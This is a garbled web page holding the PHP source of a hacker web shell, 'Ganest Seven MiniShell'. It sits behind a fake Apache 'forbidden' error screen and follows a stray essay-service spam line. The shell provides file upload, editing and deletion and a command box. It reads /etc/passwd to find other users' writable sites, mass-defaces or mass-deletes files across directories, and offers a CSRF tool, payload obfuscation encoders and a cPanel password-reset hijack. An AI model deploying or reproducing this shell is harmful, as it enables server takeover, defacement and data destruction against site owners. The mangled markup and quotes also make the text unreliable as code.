shell

A

Additionally, you will likely free essay writing help online find yourself able to choose from several distinct services instead of trying to get customized essays written by somebody you don’t know.

single poor sentence will cost you.

<font-family=”sans serif=””>’; ?>

‘; ?> </font-family=”sans>


You don’t have permission to access
on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


 Apache/2.2.14 (Ubuntu) Server at localhost Port 80
‘;
exit;
}
}
?>

$value){
$_POST[$key] = stripslashes($value);
}
}

echo ‘

-=[ Ganest Seven MiniShell ]=-

<font-family=”sans serif=””>
DestaX – RivalX – Demon King – AbiiGans – Andree – LutfiiFake – DemonArmy – Demon Grafia – Dinaa – Demon Alivos77- TnDew4 – Demon Altery – IboyDimas – DemonKiller – Demon Night – FarhanX- HafizHaxor – Litle_Sky – RizalX – Vn9 – Fauzan – Hasby – DAN BAPAK KOU


“;
echo ”

[ Home ]
[ Jumping ]
[ Mass Deface ]
[ Server Info ]
[ Mass Delete ]
[ New File ]
[ New Folder ]
[ Encode/Decode ]
[ CSRF ]
[ Reset Cpanel ]
[ About ]
[ Logout ]

“;
if(isset($_GET[‘filesrc’])){
echo “

Path : ‘;
if(isset($_GET[‘path’])){
$path = $_GET[‘path’];
}else{
$path = getcwd();
}
$path = str_replace(”,’/’,$path);
$paths = explode(‘/’,$path);
foreach($paths as $id=>$pat){
if($pat == ” && $id == 0){
$a = true;
echo ‘/‘;
continue;
}
if($pat == ”) continue;
echo ‘‘.$pat.’/’;
}
echo ‘
‘;
if(isset($_FILES[‘file’])){
if(copy($_FILES[‘file’][‘tmp_name’],$path.’/’.$_FILES[‘file’][‘name’])){
echo ‘Upload Berhasil
‘;
}else{
echo ‘Upload Gagal
‘;
}
}
echo ‘

File Upload :

‘;
echo ”

Command :

“;
echo “

Current File : “;
echo $_GET[‘filesrc’];
echo ‘

‘;
echo(‘

'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'

‘);
}elseif(isset($_GET[‘option’]) && $_POST[‘opt’] != ‘delete’){
echo ‘

</font-family=”sans>

‘.$_POST[‘path’].’

‘;
if($_POST[‘opt’] == ‘chmod’){
if(isset($_POST[‘perm’])){
if(chmod($_POST[‘path’],$_POST[‘perm’])){
echo ‘Change Permission Berhasil
‘;
}else{
echo ‘Change Permission Gagal
‘;
}
}
echo ‘

Permission :


‘;
}elseif($_POST[‘opt’] == ‘rename’){
if(isset($_POST[‘newname’])){
if(rename($_POST[‘path’],$path.’/’.$_POST[‘newname’])){
echo ‘Ganti Nama Berhasil
‘;
}else{
echo ‘Ganti Nama Gagal
‘;
}
$_POST[‘name’] = $_POST[‘newname’];
}
echo ‘

New Name :


‘;
}elseif($_POST[‘opt’] == ‘edit’){
if(isset($_POST[‘src’])){
$fp = fopen($_POST[‘path’],’w’);
if(fwrite($fp,$_POST[‘src’])){
echo ‘Berhasil Edit File
‘;
}else{
echo ‘Gagal Edit File
‘;
}
fclose($fp);
}
echo ‘




‘;
}
echo ‘

‘;
}else{
echo ‘

‘;
if(isset($_GET[‘option’]) && $_POST[‘opt’] == ‘delete’){
if($_POST[‘type’] == ‘dir’){
if(rmdir($_POST[‘path’])){
echo ‘Directory Terhapus
‘;
}else{
echo ‘Directory Gagal Terhapus
‘;
}
}elseif($_POST[‘type’] == ‘file’){
if(unlink($_POST[‘path’])){
echo ‘File Terhapus
‘;
}else{
echo ‘File Gagal Dihapus
‘;
}
}
}
// command
if($_POST[‘execmd’]) {
echo “
“;
}
// about
elseif($_GET[‘array’] == ‘about’){
echo “
أ—
Website أ—
أ— Youtube أ—
أ— Facebook أ—
أ— Subscribe Channel Youtube أ—

“;
}
//Jumping
elseif($_GET[‘array’] == ‘jumping’){
$i = 0;
echo ”

“;
if(preg_match(“/hsphere/”, $dir)) {
$urls = explode(“\r\n”, $_POST[‘url’]);
if(isset($_POST[‘jump’])) {
echo ”

";
			foreach($urls as $url) {
				$url = str_replace(array("http://","www."), "", strtolower($url));
				$etc = "/etc/passwd";
				$f = fopen($etc,"r");
				while($gets = fgets($f)) {
					$pecah = explode(":", $gets);
					$user = $pecah[0];
					$dir_user = "/hsphere/local/home/$user";
					if(is_dir($dir_user) === true) {
						$url_user = $dir_user."/".$url;
						if(is_readable($url_user)) {
							$i++;
							$jrw = "[R] $url_user";
							if(is_writable($url_user)) {
								$jrw = "[RW] $url_user";
							}
							echo $jrw."
";
						}
					}
				}
			}
		if($i == 0) { 
		} else {
			echo "
Total ada ".$i." Kamar di ".$ip;
		}
		echo "

“;
} else {
echo ‘

List Domains:

‘;
}
} elseif(preg_match(“/vhosts|vhost/”, $dir)) {
preg_match(“/\/var\/www\/(.*?)\//”, $dir, $vh);
$urls = explode(“\r\n”, $_POST[‘url’]);
if(isset($_POST[‘jump’])) {
echo ”

";
			foreach($urls as $url) {
				$url = str_replace("www.", "", $url);
				$web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
				if(is_dir($web_vh) === true) {
					if(is_readable($web_vh)) {
						$i++;
						$jrw = "[R] $web_vh";
						if(is_writable($web_vh)) {
							$jrw = "[RW] $web_vh";
						}
						echo $jrw."
";
					}
				}
			}
		if($i == 0) { 
		} else {
			echo "
Total ada ".$i." Kamar di ".$ip;
		}
		echo "

“;
} else {
echo ‘

List Domains:

‘;
}
} else {
echo ”

";
		$etc = fopen("/etc/passwd", "r") or die("Can't read /etc/passwd");
		while($passwd = fgets($etc)) {
			if($passwd == '' || !$etc) {
				echo "Can't read /etc/passwd";
			} else {
				preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
				foreach($user_jumping[1] as $user_idx_jump) {
					$user_jumping_dir = "/home/$user_idx_jump/public_html";
					if(is_readable($user_jumping_dir)) {
						$i++;
						$jrw = "[R] $user_jumping_dir";
						if(is_writable($user_jumping_dir)) {
							$jrw = "[RW] $user_jumping_dir";
						}
						echo $jrw;
						if(function_exists('posix_getpwuid')) {
							$domain_jump = file_get_contents("/etc/named.conf");	
							if($domain_jump == '') {
								echo " => ( gabisa ambil nama domain nya )
";
							} else {
								preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
								foreach($domains_jump[1] as $dj) {
									$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
									$user_jumping_url = $user_jumping_url['name'];
									if($user_jumping_url == $user_idx_jump) {
										echo " => ( $dj )
";
										break;
									}
								}
							}
						} else {
							echo "
";
						}
					}
				}
			}
		}
		if($i == 0) { 
		} else {
			echo "
Total ada ".$i." Kamar di ".$ip;
		}
		echo "

“;
}
echo ”

“;
}

//Server Info
elseif($_GET[‘array’] == ‘server_info’){

echo “Software : “;
echo ““.$_SERVER[‘SERVER_SOFTWARE’].”
“;
echo “PHP Version : “;
echo ““.PHP_VERSION.”
“;
echo “ | “;
echo “OS : “;
echo ““.PHP_OS.”
“;
echo ”
Your IP : “;
echo ““.$_SERVER[‘REMOTE_ADDR’].”
“;
echo “ | “;
echo “Server IP : “;
echo ““.gethostbyname($_SERVER[‘HTTP_HOST’]).”
“;
echo “Server : “;
echo ”
“.php_uname().”

“;
}
// mass deface
elseif($_GET[‘array’] == ‘mass_deface’) {
function sabun_massal($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = “$dir/$dirb”;
$lokasi = $dirc.’/’.$namafile;
if($dirb === ‘.’) {
file_put_contents($lokasi, $isi_script);
} elseif($dirb === ‘..’) {
file_put_contents($lokasi, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo “[DONE] $lokasi
“;
file_put_contents($lokasi, $isi_script);
$idx = sabun_massal($dirc,$namafile,$isi_script);
}
}
}
}
}
}
function sabun_biasa($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = “$dir/$dirb”;
$lokasi = $dirc.’/’.$namafile;
if($dirb === ‘.’) {
file_put_contents($lokasi, $isi_script);
} elseif($dirb === ‘..’) {
file_put_contents($lokasi, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo “[DONE] $lokasi
“;
file_put_contents($lokasi, $isi_script);
}
}
}
}
}
}
if($_POST[‘start’]) {
if($_POST[‘tipe_sabun’] == ‘mahal’) {
echo ”

“;
sabun_massal($_POST[‘d_dir’], $_POST[‘d_file’], $_POST[‘script’]);
echo “

“;
} elseif($_POST[‘tipe_sabun’] == ‘murah’) {
echo ”

“;
sabun_biasa($_POST[‘d_dir’], $_POST[‘d_file’], $_POST[‘script’]);
echo “

“;
}
} else {
echo ”

“;
echo ”

Tipe Mass Deface:
BiasaMassal
Folder:

Filename:

Index File:

“;
}
}
// mass delete
elseif($_GET[‘array’] == ‘mass_delete’) {
function hapus_massal($dir,$namafile) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = “$dir/$dirb”;
$lokasi = $dirc.’/’.$namafile;
if($dirb === ‘.’) {
if(file_exists(“$dir/$namafile”)) {
unlink(“$dir/$namafile”);
}
} elseif($dirb === ‘..’) {
if(file_exists(“”.dirname($dir).”/$namafile”)) {
unlink(“”.dirname($dir).”/$namafile”);
}
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
if(file_exists($lokasi)) {
echo “[DELETED] $lokasi
“;
unlink($lokasi);
$idx = hapus_massal($dirc,$namafile);
}
}
}
}
}
}
}
if($_POST[‘start’]) {
echo ”

“;
hapus_massal($_POST[‘d_dir’], $_POST[‘d_file’]);
echo “

“;
} else {
echo ”

“;
echo ”

Folder:

Filename:

“;
}
}
// create file
elseif($_GET[‘array’] == ‘newfile’) {
if($_POST[‘new_save_file’]) {
$newfile = htmlspecialchars($_POST[‘newfile’]);
$fopen = fopen($newfile, “a+”);
if($fopen) {
$act = ““;
} else {
$option = “permission denied“;
}
}
echo $option;
echo ”

Filename:

“;
}
// create dir / folder
elseif($_GET[‘array’] == ‘newfolder’) {
if($_POST[‘new_save_folder’]) {
$new_folder = $path.’/’.htmlspecialchars($_POST[‘newfolder’]);
if(!mkdir($new_folder)) {
$option = “permission denied“;
} else {
$act = ““;
}
}
echo $option;
echo ”

Folder Name:

“;
}
// csrf exploiter
elseif($_GET[‘array’] == ‘csrf’){
echo ‘

URL:
POST File:

‘;
$url = $_POST[“url”];
$pf = $_POST[“pf”];
$d = $_POST[“d”];
if($d) {
echo ”

“;
}
}
// encode / decode
elseif($_GET[‘array’] == ‘endecode’) {
$text = $_POST[‘code’];
$submit = $_POST[‘submit’];
if (isset($submit)){
$op = $_POST[“ope”];
switch ($op) {case ‘base64’: $codi=base64_encode($text);
break;case ‘str’ : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
break;case ‘json’ : $codi=json_encode(utf8_encode($text));
break;case ‘gzinflate’ : $codi=base64_encode(gzdeflate(str_rot13($text)));
break;case ‘gzinflater’ : $codi=base64_encode(str_rot13(gzdeflate($text)));
break;case ‘gzinflatex’ : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
break;case ‘gzinflatew’ : $codi=base64_encode(gzdeflate(str_rot13(rawurlencode(gzdeflate(convert_uuencode(base64_encode(str_rot13(gzdeflate(convert_uuencode(rawurldecode(str_rot13($text))))))))))));
break;case ‘gzinflates’ : $codi=base64_encode(gzdeflate($text));
break;case ‘str2’ : $codi=base64_encode(str_rot13($text));
break;case ‘urlencode’ : $codi=rawurlencode($text);
break;case ‘ur’ : $codi=convert_uuencode($text);
break;case ‘url’ : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
break;default:break;}}

$submit = $_POST[‘submits’];
if (isset($submit)){
$op = $_POST[“ope”];
switch ($op) {case ‘base64’: $codi=base64_decode($text);
break;case ‘str’ : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
break;case ‘json’ : $codi=utf8_dencode(json_dencode($text));
break;case ‘gzinflate’ : $codi=str_rot13(gzinflate(base64_decode($text)));
break;case ‘gzinflater’ : $codi=gzinflate(str_rot13(base64_decode($text)));
break;case ‘gzinflatex’ : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
break;case ‘gzinflatew’ : $codi=str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(base64_decode(convert_uudecode(gzinflate(rawurldecode(str_rot13(gzinflate(base64_decode($text))))))))))));
break;case ‘gzinflates’ : $codi=gzinflate(base64_decode($text));
break;case ‘str2’ : $codi=str_rot13(base64_decode($text));
break;case ‘urlencode’ : $codi=rawurldecode($text);
break;case ‘ur’ : $codi=convert_uudecode($text);
break;case ‘url’ : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
break;default:break;}}
$html = htmlentities(stripslashes($codi));
echo ‘


‘;
echo “


“;
}
// cpanel reset password
elseif($_GET[‘array’] == ‘cpanel’){
echo ‘Reset Password Cpanel

Email :

‘;

$user = get_current_user();
$site = $_SERVER[‘HTTP_HOST’];
$ips = getenv(‘REMOTE_ADDR’);

if(isset($_POST[‘submit’])){

$email = $_POST[’email’];
$wr = ’email:’.$email;
$f = fopen(‘/home/’.$user.’/.cpanel/contactinfo’, ‘w’);
fwrite($f, $wr);
fclose($f);
$f = fopen(‘/home/’.$user.’/.contactinfo’, ‘w’);
fwrite($f, $wr);
fclose($f);
$parm = $site.’:2083/resetpass?start=1′;
echo ‘


Done tinggal lu ewe aja:v
Klik disini


‘;
}
}

echo ”;
$scandir = scandir($path);
echo ‘

‘;

foreach($scandir as $dir){
if(!is_dir($path.’/’.$dir) || $dir == ‘.’ || $dir == ‘..’) continue;
echo ‘

‘;
}
echo ‘

‘;
foreach($scandir as $file){
if(!is_file($path.’/’.$file)) continue;
$size = filesize($path.’/’.$file)/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).’ MB’;
}else{
$size = $size.’ KB’;
}

echo ‘

‘;
}
echo ‘

Name
Size
Permission
Modify
‘.$dir.’
‘;
if(is_writable($path.’/’.$dir)) echo ‘‘;
elseif(!is_readable($path.’/’.$dir)) echo ‘‘;
echo perms($path.’/’.$dir);
if(is_writable($path.’/’.$dir) || !is_readable($path.’/’.$dir)) echo ‘
‘;

echo ‘





‘.$file.’
‘.$size.’
‘;
if(is_writable($path.’/’.$file)) echo ‘‘;
elseif(!is_readable($path.’/’.$file)) echo ‘‘;
echo perms($path.’/’.$file);
if(is_writable($path.’/’.$file) || !is_readable($path.’/’.$file)) echo ‘
‘;
echo ‘





‘;
}
echo ‘


Copyright © Ganest Seven


‘;
function perms($file){
$perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {
// Socket
$info = ‘s’;
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = ‘l’;
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = ‘-‘;
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = ‘b’;
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = ‘d’;
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = ‘c’;
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = ‘p’;
} else {
// Unknown
$info = ‘u’;
}

// Owner
$info .= (($perms & 0x0100) ? ‘r’ : ‘-‘);
$info .= (($perms & 0x0080) ? ‘w’ : ‘-‘);
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? ‘s’ : ‘x’ ) :
(($perms & 0x0800) ? ‘S’ : ‘-‘));

// Group
$info .= (($perms & 0x0020) ? ‘r’ : ‘-‘);
$info .= (($perms & 0x0010) ? ‘w’ : ‘-‘);
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? ‘s’ : ‘x’ ) :
(($perms & 0x0400) ? ‘S’ : ‘-‘));

// World
$info .= (($perms & 0x0004) ? ‘r’ : ‘-‘);
$info .= (($perms & 0x0002) ? ‘w’ : ‘-‘);
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? ‘t’ : ‘x’ ) :
(($perms & 0x0200) ? ‘T’ : ‘-‘));

return $info;
}
?>